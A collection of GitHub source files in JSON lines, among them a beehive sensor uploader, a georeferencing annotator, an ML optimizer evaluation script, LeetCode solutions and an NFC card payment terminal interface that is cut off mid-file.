+{"seq_id":"9822773790","text":"#!/usr/bin/python3\n\nimport serial\nimport requests\nimport datetime\n\ndef read_serial():\n data = arduino.readline().decode('utf-8').replace(' ', '')\n data = data.split(',')\n return data\n\nusb_port = '/dev/ttyACM0' # Arduino Port\narduino = serial.Serial(usb_port, 9600)\narduino.flush() \n\ntemp_super, temp_brood, humid_out, temp_out, humid_in, temp_roof, weight = read_serial()\nnow = datetime.datetime.now()\nnow = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nweight = weight.replace('\\r\\n', '')\n\njsonData = { 'created_at': now,\n 'weight': weight,\n 'temp_roof': temp_roof,\n 'temp_super_box': temp_super,\n 'temp_brood_box': temp_brood,\n 'temp_out': temp_out,\n 'humid_in': humid_in,\n 'humid_out': humid_out}\n\n# x = requests.post('https://givebeesachance.herokuapp.com/hiveData', json = jsonData)\nx = requests.post('url', json = jsonData)","repo_name":"Jak7774/honeybees","sub_path":"SendBeeData.py","file_name":"SendBeeData.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20737951907","text":"\"\"\"Defines class to describe how a georeference was determined\"\"\"\nimport logging\nimport os\nimport re\n\nfrom .evaluator import MatchEvaluator\nfrom ....bots.geonames import CODES_COUNTRIES\nfrom ....config import CONFIG\nfrom ....databases.georef_job import Session, Localities, Uncertainties\nfrom ....tools.geographic_operations.kml import Kml\nfrom ....utils.standardizers import LocStandardizer\nfrom ....utils import oxford_comma\n\n\n\n\nlogger = logging.getLogger(__name__)\n\n\n\n\nclass MatchAnnotator(MatchEvaluator):\n \"\"\"Describes how georeference was determined\"\"\"\n std = LocStandardizer()\n\n\n def __init__(self, *args, **kwargs):\n super(MatchAnnotator, self).__init__(*args, **kwargs)\n self.description = None\n\n\n @property\n def selected(self):\n \"\"\"Returns list of sites used to determine the georeference\"\"\"\n return self.interpreted_as('selected')\n\n\n def describe(self):\n \"\"\"Describes the geoerefence\"\"\"\n if self.description:\n return self.description\n self.save_parsed()\n if self.interpreted_as('selected'):\n # Calculate distance from original coordinates to active features\n if self.site.geometry:\n self.get_uncertainty()\n desc = []\n for method in [\n self._describe_selection,\n self._describe_filter,\n self._describe_uncertainty,\n self._describe_multiples,\n self._describe_encompassing,\n self._describe_intersecting,\n self._describe_less_specific,\n self._describe_more_specific,\n self._describe_ignored,\n self._describe_missed,\n self._describe_sources\n ]:\n try:\n desc.append(method())\n except AttributeError as e:\n logger.error(str(e), exc_info=e)\n desc = '\\n'.join([s for s in self._describe_miss() if s])\n break\n else:\n desc = '. '.join([s for s in desc if s]) + '.'\n selected = self.interpreted_as('selected')\n desc = desc.replace('(s)', '' if len(selected) == 1 else 's')\n else:\n desc = '\\n'.join([s for s in self._describe_miss() if s])\n # Add interpretations to debug\n for loc_id, status in self.interpreted.items():\n site = self.expand(loc_id)\n logger.debug('{} ({}): {}'.format(site.name, loc_id, status))\n logger.debug('Description:\\n{}'.format(desc))\n self.description = desc\n return desc\n\n\n def strong_match(self):\n \"\"\"Tests if georeference appears strong\"\"\"\n return (len(self.selected) == 1\n and not self.missed()\n and not self.leftovers)\n\n\n def kml(self, fn, refsite=None):\n \"\"\"Saves results as KML\"\"\"\n kml = Kml()\n try:\n kml.add_site(self.result, 'final')\n except AttributeError:\n pass\n if refsite is not None and refsite.geometry:\n kml.add_site(refsite, 'measured')\n # Get all selected and candidate sites\n candidates = self.sites[:]\n\n statuses = {'rejected (encompassed)'}\n candidates.extend(self.interpreted_as(statuses))\n\n for site in self.active():\n if site.site_kind not in {'CONT', 'OCN'}:\n candidates.append(site)\n for site in self.interpreted_as('selected'):\n candidates.extend(site.related_sites)\n for site in self.expand(candidates):\n if site.radius_km <= 2000:\n kml.add_site(site, 'candidate')\n if not fn.endswith('.kml'):\n fn = '{}.kml'.format(fn)\n kml.save(os.path.join('kml', fn))\n\n\n def _describe_selection(self):\n \"\"\"Lists the selected names and gives gist of determination\"\"\"\n groups = self.group_by_name(self.interpreted_as('selected'))\n selected = []\n for name, group in groups.items():\n combined = group[0].combine(*group[1:])\n combined.verbatim_latitude = None\n combined.verbatim_longitude = None\n for attr, code in (\n ('county', 'admin_code_2'),\n ('state_province', 'admin_code_1'),\n ('country', 'country_code')):\n if not group[0].filter.get(code):\n setattr(combined, attr, None)\n combined.site_names = [name.split(':', 1)[1]]\n # Inherit certain attributes from selected site\n combined.related_sites = group[0].related_sites\n combined.url_mask = group[0].url_mask\n combined.geometry = self.geometry\n #if (combined.geometry\n # and not re.search(r'^\\d+$', combined.location_id)):\n # combined.radius_km = group[0].radius_km\n if len(group) > 1:\n combined.url_mask = 'multiple matching localities'\n selected.append(self.name(combined))\n constrained_to = self.interpreted_as('constrained')\n if constrained_to:\n constrained_to.sort(key=lambda s: s.radius_km)\n selected += [self.name(s) for s in constrained_to]\n mask = 'the intersection between {}'\n result = mask.format(oxford_comma(selected, delim='; '))\n else:\n mask = '{}' if len(selected) == 1 else 'a circle encompassing {}'\n result = mask.format(oxford_comma(selected, delim='; '))\n return 'Coordinates and uncertainty based on {}'.format(result)\n\n\n def _describe_miss(self):\n \"\"\"Lists names considered for a missed georeference\"\"\"\n desc = []\n desc.append('Terms checked: {}'.format(self.terms_checked))\n desc.append('Terms missed: {}'.format(self.missed()))\n mask = '{} (id={}, code={}, lat={:.1f}, lng={:.1f}, radius={:.1f} km)'\n for name, group in self.group_by_name(self._sites).items():\n # Limit to active sites\n group = [s for s in group if s in self.active()]\n if group:\n desc.append(name)\n for site in group:\n lng, lat = site.centroid.coords[0]\n summary = mask.format(site.name,\n site.location_id,\n site.site_kind,\n lat,\n lng,\n site.radius_km)\n desc.append('+ {}'.format(summary))\n else:\n desc.append('{} (no active sites)'.format(name))\n return desc\n\n\n def _describe_uncertainty(self):\n \"\"\"Describes how uncertainty compares to estimate of best possible\"\"\"\n estimated = self.estimate_minimum_uncertainty()\n if 0.9 * self.radius_km <= estimated <= 1.1 * self.radius_km:\n rel = 'is similar to'\n elif self.radius_km < estimated:\n rel = 'is smaller than'\n else:\n rel = 'exceeds'\n # Round the uncertainty radius\n if estimated < 1:\n estimated = 1\n if self.radius_km < 10:\n radius_km = '{:.1f}'.format(self.radius_km)\n if radius_km.endswith('.0'):\n radius_km = radius_km.split('.')[0]\n else:\n radius_km = int(round(self.radius_km))\n return ('The uncertainty radius ({} km) {} an estimate'\n ' of the minimum likely uncertainty radius calculated'\n ' based on the provided locality information'\n ' (~{} km)').format(radius_km, rel, int(round(estimated)))\n\n\n def _describe_filter(self):\n \"\"\"Describes common elements of filters for selected sites\"\"\"\n master = None\n for site in self.interpreted_as('selected'):\n if master is None:\n master = site.filter\n else:\n master = {k: v for k, v in master.items()\n if v and v == site.filter.get(k)}\n # Map admin codes back to names\n codes = {\n 'country_code': 'country',\n 'admin_code_1': 'state_province',\n 'admin_code_2': 'county'\n }\n master = {codes.get(k, k): v for k, v in master.items() if v}\n logger.debug('Final filter: {}'.format(master))\n ordered = CONFIG.routines.georeferencing.ordered_field_list\n fltr = [f['field'] for f in ordered if f['field'] in master]\n fltr = [self.field(f).replace('_', '/') for f in fltr]\n if fltr:\n return 'Feature(s) matched on {}'.format(oxford_comma(fltr))\n return\n\n\n def _describe_encompassing(self):\n \"\"\"Lists names encompassing the selected sites\"\"\"\n sites = []\n for site in self.interpreted_as('encompassing'):\n if site.field not in {'country', 'state_province', 'county'}:\n sites.append(site)\n if sites:\n mask = ('The following place names mentioned in this record'\n ' appear to encompass the selected feature(s): {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_intersecting(self):\n \"\"\"Lists names intersecting the selected sites\"\"\"\n sites = self.interpreted_as('intersecting') + self.sites\n # Intersection with continent is not super interesting if country was matched\n countries = [s for s in self.active() if s.site_kind in CODES_COUNTRIES]\n if countries:\n sites = [s for s in sites if s.site_kind != 'CONT']\n if sites:\n mask = ('The following place names mentioned in this record'\n ' intersect the selected features: {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_multiples(self):\n \"\"\"Lists names that matched multiple sited and gives interpretation\"\"\"\n selected = self.interpreted_as('selected')\n encompassed = self.interpreted_as('rejected (encompassed)')\n rejected = self.interpreted_as('rejected (interpreted elsewhere)')\n\n groups = self.group_by_name(selected + encompassed + rejected)\n sites = []\n for name, group in groups.items():\n count = len(group)\n if count > 1:\n name = self.quote(name.split(':', 1)[1])\n # Don't mention places that were ignored\n if name not in self.ignored():\n mask = '{} (n={})'\n if group[0].intersects_all(group[1:]):\n mask = '{} (n={}, all intersecting)'\n sites.append(mask.format(name, count))\n\n if sites:\n mask = ('The following place names mentioned in this record'\n ' match multiple places: {}. The final georeference ')\n if len(selected) == 1:\n name = sites[0].split(' (n=')[0]\n explanations = self.multiples.get(name, [])\n if len(set(explanations)) != 1:\n logger.warning('Could not explain \"{}\"'.format(name))\n mask += 'uses the best match on this name'\n else:\n mask += explanations[0]\n elif (\n len(groups) == 1\n and len(set([self.key(s) for s in selected])) == 1\n ):\n name = list(groups.keys())[0]\n count = [self.key(s) for s in selected].count(name)\n if count == len(selected):\n mask += 'includes all features matching this name'\n else:\n mask += 'uses {count} features matching this name'\n else:\n mask += ('encompasses the features matching each place name'\n ' with the smallest distance between them')\n return mask.format(oxford_comma(sites))\n return\n\n\n def _describe_less_specific(self):\n \"\"\"Lists names that were less specific than the selected sites\"\"\"\n sites = self.interpreted_as('less specific')\n if sites:\n mask = ('The following place names mentioned in this record'\n ' appear to describe less specific features and'\n ' were ignored: {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_more_specific(self):\n \"\"\"Lists names that were more specific than the selected sites\"\"\"\n sites = self.interpreted_as('more specific')\n if sites:\n mask = ('The following place names mentioned in this record'\n ' appear to describe more specific features but could'\n ' not be matched: {}')\n keys = [self.key(s).split(':')[-1] for s in sites]\n names = sorted({self.quote(k) for k in keys})\n return mask.format(oxford_comma(names))\n return\n\n\n def _describe_ignored(self):\n \"\"\"Lists names that could not be reconciled with the selected sites\"\"\"\n\n # Exclude generic features signified by curly braces\n sites = [s for s in self.ignored() if not re.match(r'^{.*}$', s)]\n\n if sites:\n mask = ('The following place names mentioned in this record'\n ' could not be reconciled with other locality info'\n ' and were ignored: {}')\n return mask.format(oxford_comma(sorted(set(sites))))\n return\n\n\n def _describe_missed(self):\n \"\"\"Lists names that could not be matched at all\"\"\"\n stmt = []\n missed = self.missed()\n if missed:\n mask = ('The following place names mentioned'\n ' in this record were not found: {}')\n stmt.append(mask.format(oxford_comma(missed)))\n ignored = [s for s in self.ignored() if re.match(r'^{.*}$', s)]\n if self.leftovers or ignored:\n stmt.append('Some data in this record could not be interpreted')\n return '. '.join(stmt) if stmt else None\n\n\n def _describe_sources(self):\n \"\"\"Lists sources that provided base coordinates and geometries\"\"\"\n if self.sources:\n mask = 'This georeference is based on data from {}'\n return mask.format(oxford_comma(self.sources))\n return\n\n\n def get_uncertainty(self):\n \"\"\"Calculates distance between each feature and a reference site\"\"\"\n session = Session()\n for site in self.active():\n site_kind = site.site_kind\n if site_kind.isupper() and '_' in site.location_id:\n site_kind += '_MOD'\n threshold_km = max([self.site.radius_km + 1, 500])\n row = Uncertainties(\n occurrence_id=self.site.location_id,\n site_num=site.location_id,\n site_name=site.name,\n site_kind=site_kind,\n radius=site.radius_km,\n dist_km=site.centroid_dist_km(self.site, threshold_km)\n )\n try:\n session.add(row)\n session.commit()\n except:\n session.rollback()\n session.close()\n\n\n def name(self, site):\n \"\"\"Returns a descriptive name for a site\"\"\"\n higher_geo = []\n names = [None, None, None]\n if site.radius_km < 500:\n names = [site.county, site.state_province, site.country]\n for i, name in enumerate(names):\n if not i and site.country == 'United States':\n pattern = r'\\b(County|Co\\.?|Area)$'\n counties = []\n for county in name:\n if not re.search(pattern, county, flags=re.I):\n county = '{} Co.'.format(county)\n else:\n county = county.replace('County', 'Co.')\n counties.append(county)\n name = counties\n if isinstance(name, list):\n name = '/'.join(name)\n if name and (not higher_geo or higher_geo[-1] != name):\n higher_geo.append(name)\n options = ['ADM2', 'ADM1', 'PC']\n pattern = '|'.join([o for i, o in enumerate(options) if names[i]])\n if (site.related_sites\n or not higher_geo\n or not re.match(pattern, site.site_kind)):\n higher_geo.insert(0, self.quote(site.name, bool(site.related_sites)))\n loc = ', '.join([n for n in higher_geo if n])\n # Get the url, cleaning up the trailer on proximity matches\n source = None\n if site.url:\n source = re.sub(r'\\_[A-Z]+$', '', site.url) if site.url else None\n if site.site_kind.isupper():\n source = f'{site.site_kind}: {source}'\n elif site.site_source:\n source = f'via {site.site_source}'\n return '{} ({})'.format(loc, source) if source else loc\n\n\n def save_parsed(self):\n \"\"\"Saves parses of locality names to a SQLite database\"\"\"\n session = Session()\n attrs = ['location_id', 'country', 'state_province', 'county']\n base = {}\n for attr in attrs:\n val = getattr(self.site, attr)\n if isinstance(val, list):\n val = ' | '.join(val)\n base[attr if attr != 'location_id' else 'occurrence_id'] = val\n missed = {s.split('=', 1)[-1].strip('\"') for s in self.missed()}\n for field, features in self.features.items():\n for parsed in features:\n full = getattr(self.site, field)\n if isinstance(full, list):\n full = ' | '.join(full)\n row = {\n 'field': field,\n 'parser': parsed.kind,\n 'parsed': str(parsed),\n 'verbatim': parsed.verbatim,\n 'verbatim_full': full,\n 'missed': 1 if parsed.verbatim.strip('\"') in missed else 0,\n 'has_poly': None,\n }\n row.update(base)\n row = Localities(**row)\n try:\n session.add(row)\n session.commit()\n except:\n session.rollback()\n session.close()\n\n\n @staticmethod\n def quote(val, use_quotes=False):\n \"\"\"Adds quotes to a phrase\"\"\"\n if not use_quotes:\n use_quotes = '(' in val or re.search(r'\\b[a-z]{4,}\\b', val)\n return '\"{}\"'.format(val.strip('\"').replace('\"', \"'\")) if use_quotes else val\n","repo_name":"adamancer/nmnh_ms_tools","sub_path":"nmnh_ms_tools/routines/georeferencer/evaluators/annotator.py","file_name":"annotator.py","file_ext":"py","file_size_in_byte":19076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42998947382","text":"import argparse\r\nimport os\r\nimport time\r\nimport json\r\nimport hashlib\r\n\r\nfrom tqdm import tqdm\r\nimport torch\r\nfrom torch import nn\r\nimport numpy as np\r\n\r\nfrom models import get_model\r\nfrom ioutils import get_dataset, Logger\r\nfrom vadam import Vadam2\r\nfrom vlaprop import VLaProp\r\nfrom vsgd import VSGD\r\n\r\nparser = argparse.ArgumentParser(description='Volumization Evaluation')\r\n\r\n# task related\r\nparser.add_argument('--dataset', type=str, default=\"MNIST\")\r\nparser.add_argument('--model', type=str, default=\"DNN\")\r\nparser.add_argument('--task_id', type=str, default='default')\r\nparser.add_argument('--cuda', type=int, default=1)\r\nparser.add_argument('--save', type=bool, default=False)\r\n# optimizer related\r\nparser.add_argument('--lr', type=float, default=1e-4, help=\"learning rate\")\r\nparser.add_argument('--v', type=float, default=1, help=\"limitation of volumization\")\r\nparser.add_argument('--alpha', type=float, default=1.0, help=\"alpha\")\r\nparser.add_argument('--auto', type=float, default=True, help=\"Kaiming-V or not\")\r\nparser.add_argument('--weight_decay', type=float, default=0, help=\"default is None\")\r\nparser.add_argument('--batch_size', type=int, default=128, help=\"batch size\")\r\nparser.add_argument(\"--num_epochs\", type=int, default=100, help=\"number of epochs\")\r\nparser.add_argument(\"--lq\", type=bool, default=False)\r\nparser.add_argument(\"--optimizer\", type=str, default='adam')\r\n# noise ratio\r\nparser.add_argument('--noise_ratio', type=float, default=0.0, help=\"noise ratio\")\r\n\r\nparams = parser.parse_args()\r\nmodel_for_data = {\"MNIST\": [\"DNN\"],\r\n \"IMDB\": [\"LSTMATT\", \"LSTM\"],\r\n \"CIFAR10\": [\"ResNet18\"]}\r\nassert params.model in model_for_data[params.dataset]\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda:{}'.format(params.cuda))\r\nelse:\r\n device = 'cpu'\r\n\r\ntimestamp = time.strftime(\"%y%m%d-%H%M%S\", time.localtime())\r\nlog_dir_name = os.path.join('log', params.dataset)\r\nparam_dict = vars(params)\r\nconfig_hash = hashlib.sha224(json.dumps(param_dict).encode()).hexdigest()\r\ntask_name = params.task_id + '-' + timestamp + config_hash[:4] + \"-\" + params.model\r\n\r\n\r\ntrain_logger = Logger(task_name=task_name,\r\n dir_name=log_dir_name,\r\n heading=['epoch', 'train_loss', 'train_acc', 'val_loss', 'val_acc', 'test_loss', 'test_acc'],\r\n )\r\nwith open(os.path.join(log_dir_name, task_name + \".meta\"), mode='wt') as f:\r\n json.dump(param_dict, f)\r\n\r\n\r\ndef lq_loss(logits, Y, q=0.7):\r\n index1 = torch.arange(len(Y))\r\n prob = torch.nn.functional.softmax(logits, 1)\r\n loss = 1 - prob[index1, Y.view(-1)] ** q\r\n # print(loss.mean())\r\n return loss.mean() / q\r\n\r\n\r\nif params.lq:\r\n criterion = lq_loss\r\nelse:\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n\r\ndef train_model(model, _iter):\r\n total_epoch_loss = 0\r\n total_epoch_acc = 0\r\n\r\n model.train()\r\n for X, Y in tqdm(_iter):\r\n X, Y = X.to(device), Y.to(device)\r\n\r\n optim.zero_grad()\r\n logits = model(X)\r\n preds = torch.max(logits, 1)[1].view(Y.size())\r\n loss = criterion(logits, Y)\r\n loss.backward()\r\n optim.step()\r\n\r\n num_corrects = (preds == Y).float().sum()\r\n acc = 100.0 * num_corrects / len(Y)\r\n\r\n total_epoch_loss += loss.item()\r\n total_epoch_acc += acc.item()\r\n\r\n return total_epoch_loss / len(_iter), total_epoch_acc / len(_iter)\r\n\r\n\r\ndef eval_model(model, _iter):\r\n total_epoch_loss = 0\r\n total_epoch_acc = 0\r\n model.eval()\r\n with torch.no_grad():\r\n for idx, (X, Y) in enumerate(_iter):\r\n X = X.to(device)\r\n Y = Y.to(device)\r\n\r\n logits = model(X)\r\n preds = torch.max(logits, 1)[1].view(Y.size())\r\n loss = criterion(logits, Y)\r\n\r\n num_corrects = (preds == Y).float().sum()\r\n acc = 100.0 * num_corrects / len(Y)\r\n\r\n total_epoch_loss += loss.item()\r\n total_epoch_acc += acc.item()\r\n\r\n return total_epoch_loss / len(_iter), total_epoch_acc / len(_iter)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n embedding, train_iter, valid_iter, test_iter = get_dataset(params.dataset,\r\n rate=params.noise_ratio,\r\n batch_size=params.batch_size)\r\n model_params = {}\r\n if params.dataset == \"IMDB\":\r\n model_params[\"output_size\"] = 2\r\n model_params[\"hidden_size\"] = 256\r\n\r\n if params.model == \"LSTM\" or params.model==\"LSTMATT\":\r\n model_params[\"weights\"] = embedding\r\n\r\n if params.dataset == \"CIFAR100\":\r\n model_params[\"num_classes\"] = 100\r\n\r\n model = get_model(params.model, **model_params)\r\n model.to(device)\r\n\r\n if params.optimizer == \"laprop\":\r\n optim = VLaProp(model.parameters(), lr=params.lr, eps=1e-15,\r\n v=params.v, alpha=params.alpha, auto_v=params.auto,\r\n weight_decay=params.weight_decay)\r\n elif params.optimizer == \"adam\":\r\n optim = Vadam2(model.parameters(), lr=params.lr, eps=1e-15,\r\n v=params.v, alpha=params.alpha, auto_v=params.auto,\r\n weight_decay=params.weight_decay)\r\n elif params.optimizer == \"sgd\":\r\n optim = VSGD(model.parameters(), lr=params.lr,\r\n v=params.v, alpha=params.alpha, auto_v=params.auto,\r\n weight_decay=params.weight_decay)\r\n\r\n test_acc_list = []\r\n for epoch in range(params.num_epochs):\r\n train_loss, train_acc = train_model(model, train_iter)\r\n val_loss, val_acc = eval_model(model, valid_iter)\r\n test_loss, test_acc = eval_model(model, test_iter)\r\n test_acc_list.append(test_acc)\r\n train_logger.append(epoch + 1, train_loss, train_acc, val_loss, val_acc, test_loss, test_acc)\r\n print(np.max(test_acc_list), np.mean(test_acc_list[-10:]))\r\n if params.save:\r\n model.cpu()\r\n torch.save(model.state_dict(), \"{}nr{}v{}alpha{}.pt\".format(task_name, params.noise_ratio, params.v, params.alpha))\r\n\r\n","repo_name":"zihao-wang/volumization","sub_path":"eval_vol.py","file_name":"eval_vol.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"25561095078","text":"import datetime\n\nclass DayOverview:\n\n def __init__(self, dateRecorded, startTime, leavingTime, workHours,\n breakHours, lunchDuration, morningScheduleId, prayer):\n \"\"\"Instantiates the DayOverview Object\"\"\"\n self.dateRecorded = dateRecorded # type: datetime.date\n self.startTime = startTime # type: datetime.time\n self.leavingTime = leavingTime # type: datetime.time\n self.workHours = workHours # type: float\n self.breakHours = breakHours # type: float\n self.lunchDuration = lunchDuration # type: float\n self.morningScheduleId = morningScheduleId # type: int\n self.prayer = prayer # type: boolean\n \n def __str__(self) -> str:\n return f\"\"\"[dateRecorded: {self.dateRecorded}, startTime: {self.startTime}, leavingTime: {self.leavingTime},\n workHours: {self.workHours}, breakHours: {self.breakHours}, lunchDuration: {self.lunchDuration},\n morningScheduleId: {self.morningScheduleId}, prayer: {self.prayer}]\"\"\"","repo_name":"Adnan-Sait/task-tracker","sub_path":"models/DayOverview.py","file_name":"DayOverview.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18880436967","text":"# 2020.07.10\n# Problem Statement:\n# https://leetcode.com/problems/zigzag-conversion/\n\nclass Solution:\n def convert(self, s: str, numRows: int) -> str:\n # initialize answer string\n answer = \"\"\n \n # check empty input\n if s == \"\":\n return \"\"\n \n # calculate how many element are in each group\n # group means patterned element group in shape\n # ex: a g\n # b f h l\n # c e i k\n # d j\n # then abcdef is a group\n group_size = numRows * 2 - 2\n \n if group_size == 0:\n return s\n \n # calculate total number of groups\n if len(s) % group_size == 0:\n group_num_total = len(s) // group_size\n else:\n group_num_total = len(s) // group_size + 1\n\n # for each element, store which group it's in and its position in its group\n # build a dictionary to do the search faster later, where key = (group number, group_index), value = index\n dictionary = {}\n\n for i in range(0, len(s)):\n dictionary[(i // group_size, i % group_size)] = i\n\n # index should go before group\n # from the first group to the last\n for index in range(0, group_size//2 + 1):\n # from the first index to the middle\n for group in range(0, group_num_total):\n # get the element to store\n if (group, index) in dictionary.keys():\n answer = answer + s[dictionary[(group, index)]]\n # consider the cases when 2 elements are on the same row\n # store the element as well\n if index != 0 and index != group_size//2:\n if (group, group_size-index) in dictionary.keys():\n answer = answer + s[dictionary[(group, group_size-index)]]\n \n return answer","repo_name":"ljn1999/LeetCode-problems","sub_path":"q1-25/q06.py","file_name":"q06.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"44688531075","text":"# Url: https://leetcode.com/problems/substring-with-concatenation-of-all-words/\n# Related Topics:\n# String HashTable TwoPointers\n\n# Example:\n# Input:\n# s = \"barfoothefoobarman\",\n# words = [\"foo\",\"bar\"]\n# Output: [0,9]\n\n\nfrom collections import Counter\nclass Solution:\n def findSubstring(self, s, words):\n \"\"\"\n :type s: str\n :type words: List[str]\n :rtype: List[int]\n \"\"\"\n if not len(words) or not len(words[0]) or not len(s):\n return []\n num, l = len(words), len(words[0])\n target = Counter(words)\n w2i = {w: i for i, w in enumerate(target.keys())}\n ans = []\n for i in range(len(s)-l*num+1):\n cur = s[i: i+l]\n if cur in w2i:\n seen = [0] * num\n seen[w2i[cur]] = 1\n for j in range(i + l, i + num * l, l):\n w = s[j: j+l]\n if w in w2i and seen[w2i[w]] != target[w]:\n seen[w2i[w]] += 1\n else:\n break\n else:\n ans.append(i)\n return ans","repo_name":"EVASHINJI/LeetCode","sub_path":"Daily/30 Substring with Concatenation of All Words.py","file_name":"30 Substring with Concatenation of All Words.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6321147079","text":"def argsconnect(argsin, argsou):\n\n argstocheck = argsin\n argstorelat = argsou\n\n atclength = len(argstocheck)\n atrlength = len(argstorelat)\n\n gendict = {}\n\n for num in range(0, atclength):\n\n gendict[str(argstocheck[num])] = str(argstorelat[num])\n\n\n return gendict\n","repo_name":"T0PK3K3L1TE/Abaddon","sub_path":"Abaddon/System/StringConverter/ccd.py","file_name":"ccd.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27776175584","text":"from DAL.ApiController import getPaymentResponse\nfrom PL.AbstractBaseWindow import BaseWindow\nfrom DAL.NfcController import WriteCard, ReadCard, SecureCard\nfrom DAL.ApiController import getToken\nfrom BLL.CustomErrors import *\nimport time\n\n\nclass MainWindow(BaseWindow):\n\n def __init__(self, disp):\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'Welkom bij Ace')\n self.disp.image(self.image)\n self.disp.display()\n\nclass ModeWindow(BaseWindow):\n\n def __init__(self, disp):\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'Kies modus')\n self.drawText(30, 30, '1 | PIN mode')\n self.drawText(30, 50, '2 | Secure mode')\n self.Display()\n\nclass AmountWindow(BaseWindow):\n\n def __init__(self, disp):\n self.numbers = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'Voer bedrag in')\n self.drawText(50, 30, '0.00')\n self.Display()\n\n def getAmount(self, keypad):\n amount = ''\n while True:\n pkey = keypad.pressed_keys\n if pkey:\n self.newImage()\n self.drawText(40, 10, 'Bedrag:')\n self.drawText(5, 50, '* | Terug')\n self.drawText(80, 50, '# | OK')\n time.sleep(0.25)\n if pkey[0] == '#':\n break\n elif pkey[0] == '*' and len(amount) > 0:\n amount = amount[:-1]\n if not amount:\n self.drawText(50, 30, '0.00')\n else:\n self.drawText(50, 30, str(int(amount) / float(100)))\n self.Display()\n elif pkey[0] in self.numbers:\n amount += str(pkey[0])\n self.drawText(50, 30, str(int(amount) / float(100)))\n self.Display()\n else:\n continue\n return int(amount)/float(100)\n\nclass PinWindow(BaseWindow):\n\n def __init__(self, disp, amount):\n self.amount = amount\n super().__init__(disp)\n\n def show(self):\n self.drawText(30, 10, 'TOT {0} EUR'.format(self.amount))\n self.drawText(30, 30, \"Uw kaart AUB\")\n self.Display()\n\n def getPin(self, keypad):\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(self.amount))\n self.drawText(30, 30, \"Uw PIN AUB\")\n self.Display()\n numbers = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n time.sleep(1)\n pin = ''\n output = ''\n while True:\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(self.amount))\n self.drawText(5, 50, '* | Terug')\n self.drawText(80, 50, '# | OK')\n pkey = keypad.pressed_keys\n if pkey:\n time.sleep(0.25)\n if pkey[0] == '#':\n break\n elif pkey[0] == \"*\" and len(pin) > 0:\n pin = pin[:-1]\n output = output[:-2]\n self.drawText(45, 30, output)\n self.Display()\n elif pkey[0] in numbers and len(pin) < 4:\n pin += str(pkey[0])\n output += '*'\n output += ' '\n self.drawText(45, 30, output)\n self.Display()\n else:\n continue\n return pin\n\nclass PaymentWindow(BaseWindow):\n\n def __init__(self, disp, keypad, pn532):\n self.keypad = keypad\n self.pn532 = pn532\n super().__init__(disp)\n\n def show(self):\n aw = AmountWindow(self.disp)\n aw.show()\n amount = aw.getAmount(self.keypad)\n if not (0.01 <= amount <= 50000.00):\n raise UserError(\"Ongeldig brag\")\n print(\"Amount = {0}\".format(amount))\n pw = PinWindow(self.disp, amount)\n pw.show()\n print(\"entering reading card\")\n cardId = ReadCard(self.pn532)\n print(\"CardId = {0}\".format(cardId))\n if cardId:\n pin = pw.getPin(self.keypad)\n print(\"Pin = {0}\".format(pin))\n token = getToken()\n print(\"Creating response!\")\n response = getPaymentResponse(token, amount, pin, cardId)\n print(\"Response: \" + '\\n' + str(response.text))\n while not response.status_code == 201:\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(amount))\n if response.status_code == 401:\n print(response.text)\n if response.text == 'Unauthorized':\n token = getToken()\n response = getPaymentResponse(token, amount, pin, cardId)\n else:\n self.drawText(30, 30, 'Incorrect PIN.')\n self.disp.image(self.image)\n self.disp.display()\n time.sleep(3)\n pw.show()\n pin = pw.getPin(self.keypad)\n response = getPaymentResponse(token, amount, pin, cardId)\n elif response.status_code == 404:\n print(response.text)\n self.drawText(10, 30, 'Kaart niet herkend')\n self.disp.image(self.image)\n self.disp.display()\n time.sleep(3)\n pw.show()\n cardId = ReadCard(self.pn532)\n if cardId:\n pin = pw.getPin(self.keypad)\n response = getPaymentResponse(token, amount, pin, cardId)\n elif response.status_code == 429 or response.status_code == 403:\n raise UserError('Kaart geblokkeerd.')\n elif response.status_code == 400:\n raise UserError('Onvoldoende Saldo.')\n elif response.status_code == 403:\n raise UserError('Toegang geweigerd.')\n else:\n raise CancelError\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(amount))\n self.drawText(40, 30, 'AKKOORD')\n self.disp.image(self.image)\n self.disp.display()\n else:\n raise NFCScanError\n\nclass SecureWindow(BaseWindow):\n\n def __init__(self, disp):\n super().__init__(disp)\n\n def show(self, cardId):\n self.drawText(20, 10, '{0}'.format(cardId))\n self.drawText(50, 30, 